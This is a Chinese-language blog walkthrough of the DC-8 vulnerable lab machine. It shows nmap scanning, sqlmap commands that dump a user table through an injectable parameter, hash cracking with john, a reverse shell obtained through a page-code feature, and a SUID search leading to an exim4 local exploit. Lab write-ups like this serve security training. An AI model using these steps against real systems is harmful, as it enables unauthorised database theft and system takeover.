首页 > 其他分享 >dc-8

dc-8

时间:2024-09-21 21:35:18浏览次数:7  
标签:sqlmap 查看 -- py dc 192.168 python

靶机下载地址:dc-8

找到靶机

nmap -sV 192.168.6.0/24

查看端口

疑似有注入点

image

开始尝试

python sqlmap.py -u "http://192.168.6.135/?nid=*" --dbs
查库

python sqlmap.py -u "http://192.168.6.135/?nid=*" -D "d7db" --tables
查表

python sqlmap.py -u "" -D "d7db" -T "users" --columns
查字段

python sqlmap.py -u "" -D "d7db" -T "users" -C "uid,name,pass" --dump
查内容

image

查出来的是经过md5加密的我们可以利用kali的john来破解一下

vim md5.txt
将密文写入文件
john md5.txt
开始破解

最终结果是turtle

image

扫目录扫出来了登陆页面

破解密码后直接登录查看
经过不断的测试我们发现可插入页面代码的功能

image

我们直接反弹shell

之后就是简单的提权

find / -perm -u=s -type f 2>/dev/null

image

发现存在exim4提权
查看版本exim4 --version

image

先查看本地漏洞库

searchsploit exim

image

查看46996.sh
使用方法就是下载到靶机上直接运行即可

image

image

image

image
image
image

标签:sqlmap,查看,--,py,dc,192.168,python
From: https://www.cnblogs.com/dghh/p/18424536

相关文章

  • Autosar Dcm开发-诊断2E或31服务实现pending功能
    文章目录前言Dcm规范功能实现总结前言项目开发过程中,有需求在31服务(Routine)收到请求时,等待应用层反馈执行完后再进行响应。所以pending一段时间,本文介绍该功能的实现。Dcm规范以Routine为例,其服务包含以下返回状态0:E_OK,服务成功执行1:E_NOT_OK,服务执行......
  • DC-1通关详解
    一、环境搭建:1、靶机描述DC-1是一个专门建立的脆弱实验室,目的是获得渗透测试领域的经验。它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali......
  • dc-5
    靶机下载:dc-5首先先找到靶机nmap-sV192.168.6.0/24去看一下端口服务联系这个地方存在输入我们可以进行尝试,没有什么效果但是发现这个地方的数字一直会改变再看url怀疑存在文件包含漏洞我们扫一下目录发现footer.php即为刚才页面变化的数值这样我们及确定存在文件......
  • 如何基于Flink CDC与OceanBase构建实时数仓,实现简化链路,高效排查
    本文作者:阿里云FlinkSQL负责人,伍翀,ApacheFlinkPMCMember&Committer众多数据领域的专业人士都很熟悉ApacheFlink,它作为流式计算引擎,流批一体,其核心在于其强大的分布式流数据处理能力,同时巧妙地融合了流计算与批计算的能力,因此成为了众多企业在进行流式计算业务时的首......
  • C++使用Win32GDI DC进行屏幕截图
    代码#include<windows.h>#include<Psapi.h>#include<algorithm>#include<cstdio>#include<cstdlib>#include<cstring>#include<iostream>#include<memory>#include<string>#include<thread>#......
  • Flink-cdc丢失数据排查
    一、获取任务信息任务id:i01f51582-d8be-4262-aefa-000000任务名称:ods_test1234丢失的数据时间:2024-09-1609:28:47 二、数据同步查看日志1、筛选日志筛选2024-09-1609:28:47到5分钟后数据2、查找快照id,筛选内容Committedsnapshot7258609197164498019(BaseRowDelt......
  • 渗透测试综合靶场 DC-1 通关详解
    Vulnhub是一个提供各种漏洞环境的靶场平台,非常适合安全爱好者和渗透测试初学者进行学习和实践。在这个平台上,你可以下载多种虚拟机,这些虚拟机预装了各种漏洞,让你可以在本地环境中进行渗透测试、提权、漏洞利用和代码审计等操作。官网:https://www.vulnhub.com从今天起,我们将逐......
  • Qt::BlockingQueuedConnection 与 QMetaCallEvent
    Qt创建连接类型如果是Qt::BlockingQueuedConnection,即senderthread与receiverthread不同,但是要求sendersignal与receiverslot执行是不同线程间的同步行为。也即:在sendersignal发出后sender线程要等待receiver线程的slot执行完后才能继续向后执行指令。......
  • STM32H723+DMA+ADC多通道 问题记录
    出现的问题1:ADC当开启扫描模式、DMA开始连续模式的时候,依然只能读出第一个通道的ADC的值,后面通道的AD值不更新。尝试过将buf固定在RAM_D3中也没有用。实际最后问题在于,用STM32CubeMX配置工具生成代码的时候,ADC初始化的函数放在了DMA初始化的前面导致的问题。出现的问题2:当开......
  • Hadoop(十五)项目考核 WordCount案例
    一、需求分析需求:在给定的文本文件中统计输出每一个单词出现的总次数SEVENTEEN.txt文本内容如下:saythenameseventeenhelloweareseventeennicetomeetyouyouverynice按照MapReduce编程规范,分别编写Mapper,Reducer,Driver1、Mapper(1)将MapTask传过来的文本内容......